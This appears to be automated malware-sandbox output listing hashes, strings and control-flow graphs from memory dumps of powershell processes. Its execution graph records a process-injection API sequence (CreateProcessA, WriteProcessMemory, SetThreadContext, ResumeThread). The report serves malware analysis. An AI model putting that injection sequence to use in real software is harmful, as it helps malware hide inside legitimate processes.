                                                      • Opcode ID: 864f5ae2417cb09a6caad60fac0745f4986ec2b1fa9adc4d0d077d5b07806078
                                                      • Instruction ID: 15e6c69c759b73dd40b7260ba1da9fdfe68785b006f9d0bf5b89f2447157637c
                                                      • Opcode Fuzzy Hash: 864f5ae2417cb09a6caad60fac0745f4986ec2b1fa9adc4d0d077d5b07806078
                                                      • Instruction Fuzzy Hash: B1724731E0DB8A4FE35AAA2C98155B47BE1FF56260F0901FBD04DC71A3DF289C468756
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2866180098.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :I
                                                      • API String ID: 0-4148981902
                                                      • Opcode ID: d398d9d9de40d4c2461dbb8ac18f695c6c7e1acd89e111f4faa2ecaefad9d274
                                                      • Instruction ID: 62e8cf2fbce0398357372de8572d69023397442c16402bb51fc91c3a1b0bf132
                                                      • Opcode Fuzzy Hash: d398d9d9de40d4c2461dbb8ac18f695c6c7e1acd89e111f4faa2ecaefad9d274
                                                      • Instruction Fuzzy Hash: A021D232E1DA5B4FE3A9EA18545157436D1FF652A8F5900BAC00ECB1A6CF28EC448349
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2866180098.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a581b14ee4b125c6be615bd4ae8dcb87dd6d2bd25f5dbfb3f94cd0cce99b8f2d
                                                      • Instruction ID: 4e0322654ec4eaa21016a80775641c2d25deccaacc0af70c5eca88224744e23c
                                                      • Opcode Fuzzy Hash: a581b14ee4b125c6be615bd4ae8dcb87dd6d2bd25f5dbfb3f94cd0cce99b8f2d
                                                      • Instruction Fuzzy Hash: 02D11331D0EACA9FE75AAB6858155B57BE0FF16294F0802FAD44DCB0E3EB289C058355
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5ba15208c54a3ad46f07dbde221eebb4ba2ab5cd77404a2ca8b209c91b16301
                                                      • Instruction ID: e565108a896d97fddc11993014b5b9242791639d1d936fb036896a30c9eae66b
                                                      • Opcode Fuzzy Hash: e5ba15208c54a3ad46f07dbde221eebb4ba2ab5cd77404a2ca8b209c91b16301
                                                      • Instruction Fuzzy Hash: 9441B372C4F7D55FD312AB786CA61E47FA0EF12168B0900F7D488CB0A3EA191549C7A6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2866180098.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c6bb6427ae5dbcb05bcd3a084e9701cfce39876b117457569b43e910084b9961
                                                      • Instruction ID: cd898c65752cbaa4222d456388a1db7a8eea6ae279e7b6b1c594b6e01a590a24
                                                      • Opcode Fuzzy Hash: c6bb6427ae5dbcb05bcd3a084e9701cfce39876b117457569b43e910084b9961
                                                      • Instruction Fuzzy Hash: 9A511521E1DA8A4FE3A6E62C98555303BD2FF95790F1801FEC04DC71E3DE29AC058B5A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d8676b3b535d5615e2bac9d95f735e3837700b215e2eb3a857c6533a2ca1eb2
                                                      • Instruction ID: d76108cc0728953eba0f2478d1487d5dc8f2c9f2c9a41126149efcf410c6bfeb
                                                      • Opcode Fuzzy Hash: 3d8676b3b535d5615e2bac9d95f735e3837700b215e2eb3a857c6533a2ca1eb2
                                                      • Instruction Fuzzy Hash: 89410831D0DB889FDB1D9B5CA8066B8BBE0FBA5710F00416FE44993256DB35B8498BC6
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2850410707.00007FF848C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848c3d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1ba5606d73a96f2ef2cc4195e7faa62693fe9c588591ec1c2bfe7e5aef1fe9c
                                                      • Instruction ID: d213ee714ddecf10d11ac325614e01bfca316649a300b6f845f39f673eef9c98
                                                      • Opcode Fuzzy Hash: d1ba5606d73a96f2ef2cc4195e7faa62693fe9c588591ec1c2bfe7e5aef1fe9c
                                                      • Instruction Fuzzy Hash: 5241027180DBC88FE796DB2898459523FF0EF56360B1505DFD088CB1A3D625A84AC7A2
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ec914923b130b9ee1cf01f5481d17e159ad5b2504ed9711f0b8f4b8ff7d65a5
                                                      • Instruction ID: f9c0c49878c928995ddcacd9dec54d799a9bef99a6be944db8e31baf3c13af0f
                                                      • Opcode Fuzzy Hash: 5ec914923b130b9ee1cf01f5481d17e159ad5b2504ed9711f0b8f4b8ff7d65a5
                                                      • Instruction Fuzzy Hash: 1F31C27190E7884FDB59DB68984A7E97FF0EF96321F0441AFC048C7162D625A84ACB52
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: d580fec08b658657cc7fabfc245c814a567e7b6e1804cbc3a87bca722c0ee82a
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: A901843010CB0C4FD748EF0CE051AB5B3E0FB85360F10056EE58AC3661DB26E882CB45
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fdc1ae7cf1323560f2b5ffdb41f4ac3a89a12b0959d873f07ba11672c54bb14f
                                                      • Instruction ID: 71b6ef9c6efbbbfc0e6f0d696bbb5484cead9da68c762a5ead1c1cc805d97a7f
                                                      • Opcode Fuzzy Hash: fdc1ae7cf1323560f2b5ffdb41f4ac3a89a12b0959d873f07ba11672c54bb14f
                                                      • Instruction Fuzzy Hash: ACF0303275C6044FDB4CAA1CF8429B5B3D1E799334B10026EE48BC2657D926E8478685
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf2455db36a1c4bb5d60ce588e7f2300cf38224a697758d1501f01af2bbc71a9
                                                      • Instruction ID: 6c2882cdc3925ed34cbe739ba4f256e638ec07c6c9048717c05c21fc698dc94d
                                                      • Opcode Fuzzy Hash: bf2455db36a1c4bb5d60ce588e7f2300cf38224a697758d1501f01af2bbc71a9
                                                      • Instruction Fuzzy Hash: F4F0303275D6048FDB4CAA1CF8429B5B3D1EB99320F10016EE48BC3697D927E8468685
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2866180098.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e9a08702a3f3fc56a921a9144bd74f7fca479f8be09ad307df42e96081b65c7a
                                                      • Instruction ID: 53d25a328ee13f210c2fbacf8375ccd590fb6c487afd944872996838b6a57777
                                                      • Opcode Fuzzy Hash: e9a08702a3f3fc56a921a9144bd74f7fca479f8be09ad307df42e96081b65c7a
                                                      • Instruction Fuzzy Hash: E6F0BE32A0D6888FD75AEB1CE4518A87BE0FF05364B1500F6E049CB1A3DB36AC94C764
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c704743030e8cca21d2fb19a8249133ebe77e1cd96acafd12af8ef5edc86876
                                                      • Instruction ID: 44fc0facdc2b48019fd9269f698193df8c6eb3324f9c435b3c3dc0642add9904
                                                      • Opcode Fuzzy Hash: 9c704743030e8cca21d2fb19a8249133ebe77e1cd96acafd12af8ef5edc86876
                                                      • Instruction Fuzzy Hash: DEE0C22024E6864FD345A26CA040BFDBB81AFC5350F64187EF4DE83387DB8D68815756
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^=$N_^@$N_^T$N_^U$N_^W$N_^Y
                                                      • API String ID: 0-17849902
                                                      • Opcode ID: f94af0281c79bb912392408bd41e155511cd5f19043091cd45b6478b26759aeb
                                                      • Instruction ID: b035ecca24f15b7a50d190bbaed7bbafada32072dcb7b6ba3d7f326ad6f72d40
                                                      • Opcode Fuzzy Hash: f94af0281c79bb912392408bd41e155511cd5f19043091cd45b6478b26759aeb
                                                      • Instruction Fuzzy Hash: F6213873B1A5256AD30136ADBC612E87740EF903B2B4605F3D359CF203DD24648B86E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^$N_^$N_^$N_^$N_^
                                                      • API String ID: 0-2528851458
                                                      • Opcode ID: 8e43fc17233d692f88b09b5309c6bfe981fd9bc4ebcb70882ddf1f3d07f05674
                                                      • Instruction ID: 58c3237172cc8eb6a509182906a8be6f2bfaca8af52d4c512bb838a9015baa7f
                                                      • Opcode Fuzzy Hash: 8e43fc17233d692f88b09b5309c6bfe981fd9bc4ebcb70882ddf1f3d07f05674
                                                      • Instruction Fuzzy Hash: B931B4B3D0FAD24FE31676395C691E66B80FF126A4F0904F3C0ED87093EE15240A9257
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^$N_^$N_^$N_^
                                                      • API String ID: 0-3900292545
                                                      • Opcode ID: d704a5e0e935ff1f3a8dc99562cb26a08e8fc607d11b733f43b11850328e4f82
                                                      • Instruction ID: fba82125ba34763fec0a687da44309a1b95d786bad34cccff5ffa9639ef4d729
                                                      • Opcode Fuzzy Hash: d704a5e0e935ff1f3a8dc99562cb26a08e8fc607d11b733f43b11850328e4f82
                                                      • Instruction Fuzzy Hash: 89418473D0FADA5FE356A6385C791A57F90EF52A94F0904F7C0D88B1A3EE04180AD316
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2859510711.00007FF848D55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D55000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff848d55000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N_^$N_^$N_^$N_^
                                                      • API String ID: 0-3900292545
                                                      • Opcode ID: 2830b6a2101adcce1d39f6969553583291bf6b558995b7aea53face22f46b37e
                                                      • Instruction ID: 8a366fc23e724c0c3e9ccd197b7ea8624d3fb866cbb341e4209f3315a03ff4ea
                                                      • Opcode Fuzzy Hash: 2830b6a2101adcce1d39f6969553583291bf6b558995b7aea53face22f46b37e
                                                      • Instruction Fuzzy Hash: 541175A3E0F9C35FF35766391C691ABAF90FF527A5B0904F3D0D887093EA15680B9205
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.2277353183.00007FF848D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_7ff848d40000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction ID: b2abebe6631ea08f08a98d03a7224bf22cf5232873f00dc056fa27f677856f99
                                                      • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                      • Instruction Fuzzy Hash: BE01447115CB084FD748EF0CE451AB5B7E0FB95364F10056DE58AC3655DB26E882CB45

                                                      Execution Graph

                                                      Execution Coverage:7.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:13
                                                      Total number of Limit Nodes:0
                                                      execution_graph 4294 7ff848d59a1d 4295 7ff848d59a2b ResumeThread 4294->4295 4297 7ff848d59ae6 4295->4297 4298 7ff848d59b18 4299 7ff848d59b21 Wow64SetThreadContext 4298->4299 4301 7ff848d59be4 4299->4301 4302 7ff848d59d24 4303 7ff848d59d2d WriteProcessMemory 4302->4303 4305 7ff848d59e26 4303->4305 4306 7ff848d5a084 4307 7ff848d5a08d 4306->4307 4307->4307 4308 7ff848d5a3a3 CreateProcessA 4307->4308 4309 7ff848d5a42f 4308->4309

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff848e20ecd-7ff848e20ed0 1 7ff848e20ed2-7ff848e20ee2 0->1 2 7ff848e20ef7-7ff848e20f19 0->2 3 7ff848e20f2c-7ff848e20f40 1->3 4 7ff848e20ee4-7ff848e20ef6 1->4 5 7ff848e210ad-7ff848e2115f 2->5 6 7ff848e20f1f-7ff848e20f29 2->6 9 7ff848e20f42-7ff848e20f47 3->9 4->2 58 7ff848e21161 5->58 59 7ff848e21166-7ff848e21177 5->59 8 7ff848e20f2b 6->8 6->9 8->3 13 7ff848e2104a-7ff848e21054 9->13 14 7ff848e20f4d-7ff848e20f50 9->14 15 7ff848e21065-7ff848e210aa 13->15 16 7ff848e21056-7ff848e21064 13->16 19 7ff848e20f99 14->19 20 7ff848e20f52-7ff848e20f65 14->20 15->5 22 7ff848e20f9b-7ff848e20f9d 19->22 20->5 27 7ff848e20f6b-7ff848e20f75 20->27 22->13 24 7ff848e20fa3-7ff848e20fa6 22->24 29 7ff848e20fa8-7ff848e20fb1 24->29 30 7ff848e20fbd-7ff848e20fc1 24->30 32 7ff848e20f8e-7ff848e20f97 27->32 33 7ff848e20f77-7ff848e20f84 27->33 29->30 30->13 39 7ff848e20fc7-7ff848e20fcd 30->39 32->22 33->32 40 7ff848e20f86-7ff848e20f8c 33->40 41 7ff848e20fe9-7ff848e20fef 39->41 42 7ff848e20fcf-7ff848e20fdc 39->42 40->32 45 7ff848e2100b-7ff848e21021 41->45 46 7ff848e20ff1-7ff848e21009 41->46 42->41 48 7ff848e20fde-7ff848e20fe7 42->48 53 7ff848e2103a-7ff848e21049 45->53 54 7ff848e21023-7ff848e21033 45->54 46->45 48->41 58->59 60 7ff848e21163 58->60 61 7ff848e21179 59->61 62 7ff848e2117e-7ff848e211a5 59->62 60->59 61->62 63 7ff848e2117b 61->63 65 7ff848e211a7-7ff848e211ac 62->65 66 7ff848e211a6 62->66 63->62 67 7ff848e211ad-7ff848e211b7 65->67 68 7ff848e211bc-7ff848e21219 65->68 66->65 67->68 71 7ff848e213aa-7ff848e2145b 68->71 72 7ff848e2121f-7ff848e21229 68->72 122 7ff848e2145d 71->122 123 7ff848e21462-7ff848e21473 71->123 73 7ff848e2122b-7ff848e21240 72->73 74 7ff848e21242-7ff848e21247 72->74 73->74 77 7ff848e2124d-7ff848e21250 74->77 78 7ff848e21347-7ff848e21351 74->78 80 7ff848e21299 77->80 81 7ff848e21252-7ff848e21265 77->81 82 7ff848e21353-7ff848e21361 78->82 83 7ff848e21362-7ff848e213a7 78->83 85 7ff848e2129b-7ff848e2129d 80->85 81->71 95 7ff848e2126b-7ff848e21275 81->95 83->71 85->78 88 7ff848e212a3-7ff848e212a6 85->88 92 7ff848e212a8-7ff848e212b1 88->92 93 7ff848e212bd-7ff848e212c1 88->93 92->93 93->78 102 7ff848e212c7-7ff848e212cd 93->102 98 7ff848e2128e-7ff848e21297 95->98 99 7ff848e21277-7ff848e21284 95->99 98->85 99->98 104 7ff848e21286-7ff848e2128c 99->104 105 7ff848e212e9-7ff848e212ef 102->105 106 7ff848e212cf-7ff848e212dc 102->106 104->98 108 7ff848e2130b-7ff848e2131e 105->108 109 7ff848e212f1-7ff848e21309 105->109 106->105 113 7ff848e212de-7ff848e212e7 106->113 118 7ff848e21320-7ff848e21335 108->118 119 7ff848e21337-7ff848e21346 108->119 109->108 113->105 118->119 122->123 124 7ff848e2145f 122->124 125 7ff848e2147a-7ff848e214c0 123->125 126 7ff848e21475 123->126 124->123 130 7ff848e214c2-7ff848e214da 125->130 131 7ff848e214e7-7ff848e2150f 125->131 126->125 127 7ff848e21477 126->127 127->125 137 7ff848e214dc-7ff848e214e6 130->137 138 7ff848e21524-7ff848e2152f 130->138 132 7ff848e2169f-7ff848e2174d 131->132 133 7ff848e21515-7ff848e2151f 131->133 175 7ff848e21759-7ff848e21765 132->175 176 7ff848e2174f-7ff848e21755 132->176 135 7ff848e21539-7ff848e2153f 133->135 136 7ff848e21521-7ff848e21522 133->136 142 7ff848e21545-7ff848e21548 135->142 143 7ff848e21634-7ff848e2163e 135->143 136->138 137->131 138->135 145 7ff848e21531-7ff848e21537 138->145 148 7ff848e2154a-7ff848e2155d 142->148 149 7ff848e21591 142->149 146 7ff848e21651-7ff848e2169c 143->146 147 7ff848e21640-7ff848e21650 143->147 145->135 146->132 148->132 160 7ff848e21563-7ff848e2156d 148->160 151 7ff848e21593-7ff848e21595 149->151 151->143 154 7ff848e2159b-7ff848e2159e 151->154 154->143 158 7ff848e215a4-7ff848e215a7 154->158 158->143 161 7ff848e215ad-7ff848e215e1 158->161 162 7ff848e2156f-7ff848e21584 160->162 163 7ff848e21586-7ff848e2158f 160->163 161->143 174 7ff848e215e3-7ff848e215e9 161->174 162->163 163->151 177 7ff848e21608-7ff848e2161e 174->177 178 7ff848e215eb-7ff848e21606 174->178 179 7ff848e21771-7ff848e217b8 175->179 180 7ff848e21767-7ff848e2176d 175->180 176->175 184 7ff848e21624-7ff848e21633 177->184 178->177 182 7ff848e217ba-7ff848e217dd 179->182 183 7ff848e217df-7ff848e217f4 179->183 180->179 182->183 187 7ff848e2183b-7ff848e21845 183->187 188 7ff848e217f6-7ff848e21838 183->188 189 7ff848e21850-7ff848e2189b 187->189 190 7ff848e21847-7ff848e2184f 187->190
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2800566071.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M_H
                                                      • API String ID: 0-3997733227
                                                      • Opcode ID: 8a2193c6a57bbeb5841d1e201765ca9f7b3f7d656d7e803ef222e599d5b03157
                                                      • Instruction ID: 7810a94eccef2392da0bc54c6396aef94f89f69ee4b116b6de57b59100cb08e6
                                                      • Opcode Fuzzy Hash: 8a2193c6a57bbeb5841d1e201765ca9f7b3f7d656d7e803ef222e599d5b03157
                                                      • Instruction Fuzzy Hash: 66724532E0EBC94FE796AB6858155B47BE1FF46260F0901FBD04DC7193DE29AC068396

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 286 7ff848e20425-7ff848e20468 289 7ff848e2046a-7ff848e2048d 286->289 290 7ff848e2048f-7ff848e204ae 286->290 289->290 294 7ff848e204b0-7ff848e204c9 290->294 295 7ff848e204d4-7ff848e204e5 290->295 294->295 299 7ff848e204e6-7ff848e20508 295->299 301 7ff848e2050a-7ff848e2053a 299->301 303 7ff848e2053c-7ff848e2056a 301->303 304 7ff848e20584 301->304 307 7ff848e20570-7ff848e2057a 303->307 308 7ff848e206d7-7ff848e20717 303->308 306 7ff848e20585-7ff848e20589 304->306 309 7ff848e2058b-7ff848e20591 306->309 310 7ff848e20593-7ff848e20598 306->310 307->310 311 7ff848e2057c-7ff848e20583 307->311 326 7ff848e20719-7ff848e20787 308->326 327 7ff848e206ad-7ff848e206d4 308->327 309->310 312 7ff848e2059e-7ff848e205a1 310->312 313 7ff848e20670-7ff848e2067a 310->313 311->304 311->306 312->313 318 7ff848e205a7-7ff848e205aa 312->318 316 7ff848e2068b-7ff848e206a9 313->316 317 7ff848e2067c-7ff848e2068a 313->317 316->327 321 7ff848e205ac-7ff848e205b5 318->321 322 7ff848e205c1-7ff848e205c5 318->322 321->322 322->313 328 7ff848e205cb-7ff848e205ce 322->328 356 7ff848e20789 326->356 357 7ff848e2078e-7ff848e2079f 326->357 327->308 331 7ff848e205d0-7ff848e205e3 328->331 332 7ff848e205e5 328->332 333 7ff848e205e7-7ff848e205e9 331->333 332->333 333->313 337 7ff848e205ef-7ff848e205f5 333->337 339 7ff848e20611-7ff848e20617 337->339 340 7ff848e205f7-7ff848e20604 337->340 341 7ff848e20619-7ff848e20631 339->341 342 7ff848e20633-7ff848e20637 339->342 340->339 344 7ff848e20606-7ff848e2060f 340->344 341->342 347 7ff848e2063e-7ff848e20647 342->347 344->339 350 7ff848e20649-7ff848e20656 347->350 351 7ff848e20660-7ff848e2066f 347->351 350->351 355 7ff848e20658-7ff848e2065e 350->355 355->351 356->357 358 7ff848e2078b 356->358 359 7ff848e207a1 357->359 360 7ff848e207a6-7ff848e207cd 357->360 358->357 359->360 362 7ff848e207a3 359->362 364 7ff848e207cf-7ff848e207f0 360->364 365 7ff848e207ce 360->365 362->360 366 7ff848e207f2-7ff848e20802 364->366 367 7ff848e20817-7ff848e20837 364->367 365->364 370 7ff848e2084c-7ff848e20852 366->370 371 7ff848e20804-7ff848e2080a 366->371 368 7ff848e2083d-7ff848e20847 367->368 369 7ff848e2098f-7ff848e20a41 367->369 372 7ff848e20849-7ff848e2084a 368->372 373 7ff848e20863-7ff848e20870 368->373 418 7ff848e20a43 369->418 419 7ff848e20a44-7ff848e20a55 369->419 376 7ff848e20854-7ff848e20856 370->376 371->376 378 7ff848e2080c-7ff848e20816 371->378 372->370 383 7ff848e20930-7ff848e2093a 373->383 384 7ff848e20876-7ff848e20879 373->384 376->373 379 7ff848e20858-7ff848e20861 376->379 378->367 379->373 387 7ff848e20949-7ff848e2098c 383->387 388 7ff848e2093c-7ff848e20948 383->388 384->383 390 7ff848e2087f-7ff848e20887 384->390 387->369 390->369 393 7ff848e2088d-7ff848e20897 390->393 394 7ff848e20899-7ff848e208a9 393->394 395 7ff848e208b0-7ff848e208b4 393->395 400 7ff848e208ab-7ff848e208ae 394->400 401 7ff848e208df-7ff848e208f9 394->401 395->383 398 7ff848e208b6-7ff848e208b9 395->398 402 7ff848e208bb-7ff848e208c4 398->402 403 7ff848e208d0-7ff848e208d4 398->403 400->395 410 7ff848e208fb-7ff848e20909 401->410 402->403 403->383 409 7ff848e208d6-7ff848e208dc 403->409 409->410 411 7ff848e208de 409->411 416 7ff848e2090b-7ff848e20918 410->416 417 7ff848e20922-7ff848e2092f 410->417 411->401 416->417 423 7ff848e2091a-7ff848e20920 416->423 418->419 421 7ff848e20a58-7ff848e20a68 419->421 422 7ff848e20a57 419->422 424 7ff848e20a6a-7ff848e20aa2 421->424 425 7ff848e20aa3-7ff848e20aa8 421->425 422->421 423->417 424->425 426 7ff848e20aaa 425->426 427 7ff848e20aac-7ff848e20ae4 425->427 426->427 433 7ff848e20c09-7ff848e20cb9 427->433 434 7ff848e20aea-7ff848e20af4 427->434 470 7ff848e20cbb 433->470 471 7ff848e20cbc-7ff848e20ccd 433->471 435 7ff848e20b0d-7ff848e20b12 434->435 436 7ff848e20af6-7ff848e20b03 434->436 439 7ff848e20b18-7ff848e20b1b 435->439 440 7ff848e20baa-7ff848e20bb4 435->440 436->435 441 7ff848e20b05-7ff848e20b0b 436->441 439->440 443 7ff848e20b21-7ff848e20b24 439->443 444 7ff848e20bc3-7ff848e20c06 440->444 445 7ff848e20bb6-7ff848e20bc2 440->445 441->435 448 7ff848e20b4b 443->448 449 7ff848e20b26-7ff848e20b49 443->449 444->433 450 7ff848e20b4d-7ff848e20b4f 448->450 449->450 450->440 455 7ff848e20b51-7ff848e20b5b 450->455 455->440 461 7ff848e20b5d-7ff848e20b67 455->461 463 7ff848e20b69-7ff848e20b73 461->463 465 7ff848e20b7a-7ff848e20b83 463->465 466 7ff848e20b9c-7ff848e20ba9 465->466 467 7ff848e20b85-7ff848e20b92 465->467 467->466 472 7ff848e20b94-7ff848e20b9a 467->472 470->471 473 7ff848e20ccf 471->473 474 7ff848e20cd0-7ff848e20d53 471->474 472->466 473->474 478 7ff848e20d59-7ff848e20d62 474->478 479 7ff848e20e32-7ff848e20e3c 474->479 478->479 480 7ff848e20e48-7ff848e20e88 479->480 481 7ff848e20e3e-7ff848e20e47 479->481
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2800566071.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ff848e20000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8bab3a95f8a929d367018442bdfffc2ff9979b5f4f8a398422b682afda392fba
                                                      • Instruction ID: 055ac81a746227182032fd11cea4941196f93fdf5dd0286e605286fcbed476d7
                                                      • Opcode Fuzzy Hash: 8bab3a95f8a929d367018442bdfffc2ff9979b5f4f8a398422b682afda392fba
                                                      • Instruction Fuzzy Hash: 6E72F221A0EAC94FE7A6BB3858256B57FE0FF56650F0901FBD089C71D3DA28AC05C356

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
